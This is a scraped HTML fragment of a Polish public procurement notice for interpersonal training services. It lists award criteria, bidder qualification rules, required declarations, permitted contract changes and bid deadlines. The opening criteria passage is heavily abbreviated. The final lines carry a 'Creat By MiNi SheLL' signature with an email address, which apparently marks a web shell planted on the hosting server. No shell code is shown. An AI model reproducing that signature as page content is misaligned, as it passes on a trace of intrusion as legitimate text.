świad.będzieprow.dojegopowst.orazwsk.ichwart.bezkw.podat.istaw.podat.odtow.iusł.którazg.zwie.wyk.b.mia.zastos.W pow.przyp.wyk.podaje w form.of.tylko wart.netto w odnies.do wsk.zakr.przed.zam.zam.w m.przez.nawsk.cenybruttood.stos.Infor.opow.obow.podat.Kryt.IIZatrud.conaj.1(jednej)os.niepełn.dorealiz.zam-max40%(Pd)Zam.wram.tegokryt.przyznaWyk.pkt.napods.oświad.zaw.wFor.of.Wyk.ot.40pktza zatrud.do realiz.zam.now.os. z niepełnospr.nie będących ob.prac.wyk/podwyk lub oddeleg.do realiz.zam.os.z niepełnospraw.zatr.ob.uwyk/podwykOs.zniepełnospraw.toos.speł.war.uzysk.stat.niepełnospr.okr.wu.z dnia27.08.1997o rehab. Zaw.i społ.o.zatrud.os.niepełnospr.lub we właś.przepis.państw członk.UelubEOGlub państw,zkt.UEzawarłaum.rów.trakt.przedsięb.w dost.do zp,na czas realizacji przed.zam.W przyp.gdyWyk.w formul.of.nieuzupełnipolaot.zatrud/oddelegoreal.zam.os.niepełnos.wów.Zam.przyznaWyk0pkt.a)Pop.zatr.nal.roz:zatr.napodst.um.opracęlubwop.o um. c-p. Tym samym os.mogą być zatrud.na podst:um.ag.,um.zl.,um.o dzieło.Zam.wym.zatr./oddeleg.1os.b)Wym.wzakr.zatrud./oddeleg.odn.siędozaangaż.os.niepeł.dorealiz.przed. Zam.poprzez pow.tej os.czynn.zw.z fakt.realiz.zam.c)Wyk.zł.oś.,najpóź.do dn.rozp.reali.um,dot zakr.i rodz. zad.,kt.będzie wyk.os.niepełnos.w ram.reali.um.d)Zam.upr.b.do kont.speł.przez Wyk.wym.dot.zatr.os. Niepełn.U2:Przy ob.pkt.zam.zas.zaokr.do dw.m.po przec.wd.zas.że trzecia cyf.po przec.od5w górę pow. zaokr.dr.cyf.po przec.w górę o1.Jeśli trz.cyf.po przec.j.mn.niż5,to dr.cyf.po przec.nie ul.zm.Zam.dok.wyb. of.t.z wyk.,kt.of.uz.w wyn.oc.najwyż.licz.pkt. Przyzn. pkt poszcz.of.odb.się w opar.o wz:L = C + Pd gdzie:L-licz.pkt uzys.przez of.C–licz.pkt uzysk.w kryt.&#34;Cena&#34;.Pd–licz.pkt uzysk.w kryt.„Zatrud.lub oddeleg.os. Niepełnos.dorealiz.zammax40pkt”2.Oc.b.podl.wył.of.niepodleg.odrzuc.3.Zanajkorzys.zos.uz.of.kt.otrz.najw.il.pktłącz.zewszys.kryt.4.Wsyt.,gdyzam.nieb.mógłok.wyb.Najkorzys.of.zewz.nato,żezost.zł.of.otak.sam.il.pkt,wez.onwyk.,kt.zło.tef.dozł.w term.okr.przez zam.of.dodat.zaw.n.cenę. Wyk.skł.of.dod.,nie m.zaofer.cen wyż.niż zaof.w up.złoż.przeznichof.5. W toku bad.of.i oc.of.zam.może ż. od wyk. Wyjaś.dot. treści złoż. przez nich of.oraz/lubinn.SkłDok.luboś.Wyk.sązob.doprzeds.wyjaś.wterm.wsk.p.zam.6.Zam.wyb.najkorzys.of.w term.zw.of.okreś.naplat.zakup.zpostęp.7.Jeżeliter.zw.of.upł.przedwyb.najkorzys.of.,zam.wez.wyk.,któr.of.otrz.najwyż.oc.do wyraż.w wyznacz.przezzam.term.pisem.zg.nawyb.jegoof.8.Wprzyp.br.zg.okt.mo.wpkt7of.podle.odrzuc.,azam.zwr.się wyraż.tak. zg.do kolej.wyk.,kt.of.zos.najwyż.oc.,chybaże,zach.przes.do unieważ.postęp.9.Zam. Unieważ.postęp.o udziel.zam. jeżeli:1)nie złoż.żad.wn. o dopusz.do udzi.w postęp. albo żadnej of2)wszys.zł.wn.o dop.do udz.w postęp.al.of.podl.odrzuc3)cena lub koszt najkorzys.of.lub of.z najni.c.przewyż.kw.kt.zam.zam.przez.na sfinan.zam.,chybażezam.m.zwię.tękw.doc.lubkosz.najkorzys.of4)wprzyp,okt.m.w art.248ust.3,art.249iart.250ust.2,zos.zł.of.dod.o tak.sam.c.lub kosz5)wyst.istot.z.oko.pow.,żepro.pos.lub wyk.zam.nieleżywinter.pub.,cze.niem.byłowcześ.przew6)post.Obar.jestniemoż.dousun.wadąuniemoż.zaw.niepod.uniew.umo.w spr.zam.pub.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie co najmniej 1 (jednej) osoby niepełnosprawnej do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w rozdziale IX SWZ oraz spełniają określone przez zamawiającego warunki udziału<br/>w postępowaniu.<br/>2. Na podstawie art. 112 ustawy pzp, o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki dotyczące:<br/>a) zdolności do występowania w obrocie gospodarczym: zamawiający nie formułuje warunku udziału w postępowaniu w tym zakresie<br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: zamawiający nie formułuje warunku udziału w postępowaniu w tym zakresie<br/>c) sytuacji ekonomicznej lub finansowej: zamawiający nie stawia warunku w powyższym zakresie<br/>d) zdolności technicznej lub zawodowej:<br/>Zamawiający wymaga, aby Wykonawca wykazał, że skieruje do realizacji zamówienia:<br/>dla każdej części :<br/>- 1 (jedną) osobą, która będzie odpowiedzialna za prawidłową realizację programu zgodnego z harmonogramem treningu interpersonalnego, w tym: prowadzenia dokumentacji, kontakt z Zamawiającym, organizacji czasu wolnego podczas trwania szkolenia wyjazdowego, zapewnienia sprawnego zakwaterowania i wykwaterowania uczestników/czek wraz ze wsparciem w przypadku ewentualnych problemów/reklamacji związanych z użytkowaną infrastrukturą hotelową.<br/>- 2 (dwoma) wykwalifikowanymi trenerami, którzy będą przeprowadzać trening interpersonalny w języku polskim, którzy:<br/>a) ukończyli studia pierwszego stopnia na kierunku psychologia i studia drugiego stopnia na kierunku psychologia i uzyskali tytuł magistra lub ukończyli jednolite studia magisterskie na kierunku psychologia i uzyskali tytuł magistra<br/>lub <br/>ukończyli studia na dowolnym kierunku (min. studia licencjackie) – uzupełnione studiami podyplomowymi z zakresu psychoterapii lub coachingu lub uzupełnione ukończonym kursem trenerskim z zakresu treningu interpersonalnego lub treningu psychologicznego lub treningu socjoterapii. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">nie dotyczy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">dla części I, części II, części III, części IV: <br/>wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego wraz z informacjami na temat ich wykształcenia niezbędnego do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do ich dysponowania na Załączniku nr 5 a,b,c,d do nin. SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Oferta składana jest pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. Ofertę należy sporządzić na formularzu, stanowiącym Załącznik nr 1 a,b,c,d do nin. SWZ;<br/>2. Oświadczenie o spełnieniu warunków udziału w postępowaniu w zakresie wskazanym<br/>w Rozdziale VIII pkt. 2 SWZ – Załącznik nr 2 a,b,c,d do SWZ. Oświadczenie, o którym mowa powyżej, składa (wraz z ofertą) oddzielnie:<br/>1) każdy z Wykonawców wspólnie ubiegających się o zamówienie. W tym przypadku oświadczenie potwierdza brak podstaw wykluczenia wykonawcy oraz spełnienie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnienie warunków udziału w postępowaniu;<br/>2) podmiot udostępniający zasoby, na którego potencjał powołuje się wykonawca celem potwierdzenia spełnienia warunków udziału w postępowaniu. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia wykonawcy oraz spełnienie warunków udziału w postępowaniu w zakresie, w jakim podmiot udostępnia swoje zasoby wykonawcy.<br/>3. Oświadczenie o niepodleganiu wykluczeniu na Załączniku nr 3 a,b,c,d w zakresie wskazanym w Rozdziale X SWZ. Oświadczenie stanowi dowód potwierdzający brak podstaw wykluczenia w postępowaniu na dzień składania ofert. Oświadczenie, o którym mowa powyżej wraz z ofertą składa oddzielnie:<br/>1) każdy z Wykonawców wspólnie ubiegający się o zamówienie. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia wykonawcy oraz spełnienie warunków udziału w postępowaniu w zakresie, w jakim każdy<br/>z wykonawców wykazuje spełnianie warunków udziału w postępowaniu;<br/>2) podmiot udostępniający zasoby, na którego potencjał powołuje się wykonawca celem potwierdzenia spełniania warunków udziału w postępowaniu. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim podmiot udostępnia swoje zasoby wykonawcy.<br/>4. Upoważnienie (pełnomocnictwo) lub inny dokument, potwierdzający umocowanie do reprezentowania wykonawcy (podpisania oferty), o ile nie wynika ono z dokumentów rejestrowych wykonawcy. Powyższy zapis stosuje się odpowiednio do osoby działającej w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz do osoby działającej w imieniu podmiotu udostępniającego zasoby wykonawcy.<br/>5. Pełnomocnictwo do reprezentowania wykonawców ubiegających się wspólnie (konsorcja, spółki cywilne)<br/>o przedmiotowe zamówienie, określające zakres udzielonego pełnomocnictwa (pełnomocnik winien być powołany przez wszystkich wykonawców ubiegających się wspólnie o zamówienie).<br/>6. Zobowiązanie podmiotu udostępniającego zasoby (lub inny środek dowodowy) potwierdzający, że stosunek łączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności: zakres zasobów podmiotu udostępniającego zasoby przy wykonywaniu zamówienia, czy<br/>i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących kwalifikacji zawodowych, wykształcenia lub doświadczenia zrealizuje usługi, których wskazane zdolności dotyczą – według wzoru stanowiącego Załącznik nr 4 a,b,c,d do SWZ.<br/>7. Oświadczenie z którego wynika, które usługi wykonają poszczególni wykonawcy, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane. Zamawiający dopuszcza złożenie tego oświadczenia na formularzu ofertowym. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia publicznego. W takim przypadku wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu<br/>i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego. Wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie z pełnomocnikiem.<br/>2. Warunek dotyczy uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w art. 112 ust. 2 pkt 2 ustawy pzp, zostanie spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji te uprawnienia są wymagane.<br/>3. W odniesieniu do warunków dotyczący wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawców wspólnie ubiegających się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonują usługi, do realizacji których te zdolności są wymagane.<br/>4. W przypadku, o którym mowa w pkt 2 i 3, wykonawcy wspólnie ubiegających się o dzielnie zamówienia dołączają odpowiednio do oferty oświadczenie z którego wynika, które usługi wykonują poszczególni wykonawcy. Zamawiający dopuszcza złożenie tego oświadczenia na formularzu ofertowym. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.Zamawiający działając zgodnie z dyspozycją art. 454 i art. 455 ustawy Prawo zamówień publicznych przewiduje możliwość zmiany umowy m. in. w przypadku zmiany przepisów powszechnie obowiązującego prawa, w tym przepisów Ustawy o pomocy społecznej z dnia 12 marca 2024 r. oraz Ustawy o realizowaniu usług społecznych przez centrum usług społecznych z dna 19 lipca 2019 r. oraz aktów wykonawczych do tych ustaw. <br/>2. Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w zakresie:<br/>1) wystąpienia siły wyższej o której mowa w §13 niniejszej umowy.<br/>2) ogłoszenia na obszarze Rzeczypospolitej Polskiej stanu epidemii.<br/>3. Nie stanowi zmiany Umowy, w szczególności:<br/>1) zmiana osób odpowiedzialnych za realizację Umowy,<br/>2) zmiana danych teleadresowych,<br/>3) sytuacja opisana w §2 ust.5 Umowy,<br/>4) zmiany osoby prowadzącej trening interpersonalny – pod warunkiem zapewnienia osoby o wykształceniu i doświadczeniu nie mniejszym, niż pierwotnie zaproponowana osoba oraz spełniająca warunki udziału w postępowaniu. Niniejsza zmiana wymaga zatwierdzenia danej osoby przez zamawiającego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-08-12 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://mops-czeladz.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-08-12 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-09-10</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com